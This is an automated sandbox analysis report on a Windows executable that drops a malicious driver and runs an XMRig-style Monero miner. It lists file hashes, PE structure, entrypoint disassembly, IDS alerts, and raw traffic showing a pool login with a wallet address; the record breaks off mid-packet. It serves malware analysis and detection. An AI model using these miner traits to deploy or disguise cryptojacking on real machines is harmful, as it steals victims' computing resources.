                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_dmcpz4ps.vdx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_ipc31scb.2aq.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_tqqpx1nd.trx.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\yycjbdwxjaoe.sys

                                                                              Download File
                                                                              Process:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: chrtrome22.exe, Detection: malicious, Browse
                                                                              • Filename: pTVKHqys2h.exe, Detection: malicious, Browse
                                                                              • Filename: 174.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: 47SXvEQ.exe, Detection: malicious, Browse
                                                                              • Filename: xmr new.exe, Detection: malicious, Browse
                                                                              • Filename: eth.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: hiwA7Blv7C.exe, Detection: malicious, Browse
                                                                              • Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.537334125155787
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:gem2.exe
                                                                              File size:2'876'416 bytes
                                                                              MD5:990a3f3b1273510f210fb9b541da219f
                                                                              SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
                                                                              SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
                                                                              SHA512:495734313cae980d3f48ef78422cf9484eb347833672fd5c693f8f8c92c1c0d51986795cd55a3148be18ff0c9d36adff5a1c3ff18200668dd33f3978a459c246
                                                                              SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                              TLSH:29D523E536CE4726C8143C71F4A6898918EF7A8AD3BBB1B7644483736A747B34DB7048
                                                                              File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`........................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x140001140
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x678007E8 [Thu Jan 9 17:31:20 2025 UTC]
                                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:de41d4e0545d977de6ca665131bb479a

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              dec eax
                                                                              mov eax, dword ptr [00009ED5h]
                                                                              mov dword ptr [eax], 00000001h
                                                                              call 00007F5288D58BAFh
                                                                              nop
                                                                              nop
                                                                              nop
                                                                              dec eax
                                                                              add esp, 28h
                                                                              ret
                                                                              nop
                                                                              inc ecx
                                                                              push edi
                                                                              inc ecx
                                                                              push esi
                                                                              push esi
                                                                              push edi
                                                                              push ebx
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov edi, dword ptr [eax+08h]
                                                                              dec eax
                                                                              mov esi, dword ptr [00009EC9h]
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F5288D58BD0h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              je 00007F5288D58BCBh
                                                                              dec esp
                                                                              mov esi, dword ptr [0000BAA9h]
                                                                              nop word ptr [eax+eax+00000000h]
                                                                              mov ecx, 000003E8h
                                                                              inc ecx
                                                                              call esi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F5288D58BA7h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              jne 00007F5288D58B89h
                                                                              dec eax
                                                                              mov edi, dword ptr [00009E90h]
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F5288D58BAEh
                                                                              mov ecx, 0000001Fh
                                                                              call 00007F5288D618B4h
                                                                              jmp 00007F5288D58BC9h
                                                                              cmp dword ptr [edi], 00000000h
                                                                              je 00007F5288D58BABh
                                                                              mov byte ptr [002BED21h], 00000001h
                                                                              jmp 00007F5288D58BBBh
                                                                              mov dword ptr [edi], 00000001h
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E7Ah]
                                                                              dec eax
                                                                              mov edx, dword ptr [00009E7Bh]
                                                                              call 00007F5288D618ABh
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F5288D58BBBh
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E50h]

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc9780x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c50000x350.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2c20000x18c.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c60000x78.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xb0a00x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4100x138.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xcb100x158.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x90660x92000a4b4175ec481c50c984590193f52f1aFalse0.4883615154109589data6.152703474213046IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0xb0000x20cc0x2200d031d7bab38efd70773bc93d35fb58a6False0.45128676470588236data4.641594651888488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xe0000x2b31900x2b20003a7c43391555cab936df087d609d1d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0x2c20000x18c0x20071971e4bff0784f885ec5f86f32b6a4aFalse0.521484375data3.204851117192452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .00cfg0x2c30000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .tls0x2c40000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x2c50000x3500x40056e59519fb7d2369bbf7a9e80aa61940False0.3642578125data2.8188436463026587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x2c60000x780x2006490b02f8b3f1652073b3b9bdd2acfb4False0.236328125data1.4268248333801306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x2c50600x2f0SysEx File - IDPEnglishUnited States0.449468085106383

                                                                              Imports

                                                                              DLLImport
                                                                              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-10T10:15:53.890023+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.549704141.94.96.14480TCP
                                                                              2025-01-10T10:16:08.375586+01002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.5601741.1.1.153UDP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 10:16:08.388164043 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:08.393201113 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:08.393892050 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:08.393892050 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:08.399065018 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:09.015577078 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:09.061813116 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:16.436534882 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:16.608546019 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:17.384366035 CET5029453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:17.389271975 CET53502941.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:17.389355898 CET5029453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:17.389399052 CET5029453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:17.394181013 CET53502941.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:17.852317095 CET53502941.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:17.854166985 CET5029453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:17.859652996 CET53502941.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:17.859713078 CET5029453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:26.792152882 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:26.842930079 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:42.813124895 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:16:42.858817101 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:16:43.119462967 CET5630253192.168.2.5162.159.36.2
                                                                              Jan 10, 2025 10:16:43.124329090 CET5356302162.159.36.2192.168.2.5
                                                                              Jan 10, 2025 10:16:43.124408960 CET5630253192.168.2.5162.159.36.2
                                                                              Jan 10, 2025 10:16:43.126420021 CET5630253192.168.2.5162.159.36.2
                                                                              Jan 10, 2025 10:16:43.131407976 CET5356302162.159.36.2192.168.2.5
                                                                              Jan 10, 2025 10:16:43.585133076 CET5356302162.159.36.2192.168.2.5
                                                                              Jan 10, 2025 10:16:43.585324049 CET5630253192.168.2.5162.159.36.2
                                                                              Jan 10, 2025 10:16:43.590455055 CET5356302162.159.36.2192.168.2.5
                                                                              Jan 10, 2025 10:16:43.590512037 CET5630253192.168.2.5162.159.36.2
                                                                              Jan 10, 2025 10:17:02.004745960 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:17:02.061851978 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:17:24.294970989 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:17:24.405498028 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:17:35.474283934 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:17:35.593220949 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:17:50.287472010 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:17:50.405512094 CET4970480192.168.2.5141.94.96.144
                                                                              Jan 10, 2025 10:18:02.472278118 CET8049704141.94.96.144192.168.2.5
                                                                              Jan 10, 2025 10:18:02.608628035 CET4970480192.168.2.5141.94.96.144

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 10:16:08.375586033 CET6017453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 10:16:08.383467913 CET53601741.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:17.382879972 CET53606151.1.1.1192.168.2.5
                                                                              Jan 10, 2025 10:16:43.119062901 CET5352406162.159.36.2192.168.2.5
                                                                              Jan 10, 2025 10:16:43.595828056 CET53503351.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 10:16:08.375586033 CET192.168.2.51.1.1.10x8dfcStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 10:16:08.383467913 CET1.1.1.1192.168.2.50x8dfcNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 10:16:08.383467913 CET1.1.1.1192.168.2.50x8dfcNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:16:08.383467913 CET1.1.1.1192.168.2.50x8dfcNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:16:08.383467913 CET1.1.1.1192.168.2.50x8dfcNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:16:14.608594894 CET1.1.1.1192.168.2.50xf5ddNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:16:14.608594894 CET1.1.1.1192.168.2.50xf5ddNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 10:18:05.976294994 CET1.1.1.1192.168.2.50x5e45No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704141.94.96.144807720C:\Windows\System32\dialer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 10:16:08.393892050 CET596OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48
                                                                              Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw","pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/
                                                                              Jan 10, 2025 10:16:09.015577078 CET538INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 65 38 66 38 65 39 39 34 2d 32 31 36 39 2d 34 61 32 65 2d 61 63 63 38 2d 65 30 63 37 35
                                                                              Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"e8f8e994-2169-4a2e-acc8-e0c75b3b642e","job":{"blob":"1010d5ca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000e4ca76ca8bbef9ca2fc970454a16da2d22485220e56fe6bb644
                                                                              Jan 10, 2025 10:16:16.436534882 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 66 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010dfca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e9000000000947dd404a12f426f95845e20674127ad9dbc71a008f4ffb0dd66479a304578432","job_id":"nfWQgLsMZ8GInFD0hFgmhebqleLq"
                                                                              Jan 10, 2025 10:16:26.792152882 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 61 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eaca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000b47ba232c74d01b2b43e0033cdaf5f25b0357e8e923845984bc6e86116ac5bb636","job_id":"F7s3gATm+b/1wn8mFNiTRzW98F1P"
                                                                              Jan 10, 2025 10:16:42.813124895 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 61 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010faca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000f083df92812ba472d6471dcb5b030626c2bb1ffe83967cdf9b4ad97de9b8d4003c","job_id":"qOwl+pj91emLAHG8+mlavDHj9a1t"
                                                                              Jan 10, 2025 10:17:02.004745960 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 64 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108dcb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e90000000054592777daa1dc07ba211b0bacd7591cd19b1615d80eb6c3296af220b4fc15313e","job_id":"hHRXZ1eu5bsbTX1e91HSf8qbZ+3P"
                                                                              Jan 10, 2025 10:17:24.294970989 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 33 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3cb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000cf010714010cd5572cd2300f1d6ff089629542c184a65d9ab86460e11143abfb45","job_id":"X14Nsb5vbQEDX14fXzM2LAWiCzdE"
                                                                              Jan 10, 2025 10:17:35.474283934 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 65 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010aecb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000161711aee4ee7d09f028c6809145c22eda8d400388593e97805af607d90f34d147","job_id":"OCg718AGkji+Put01QSGDUrdn1ZG"
                                                                              Jan 10, 2025 10:17:50.287472010 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 64 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
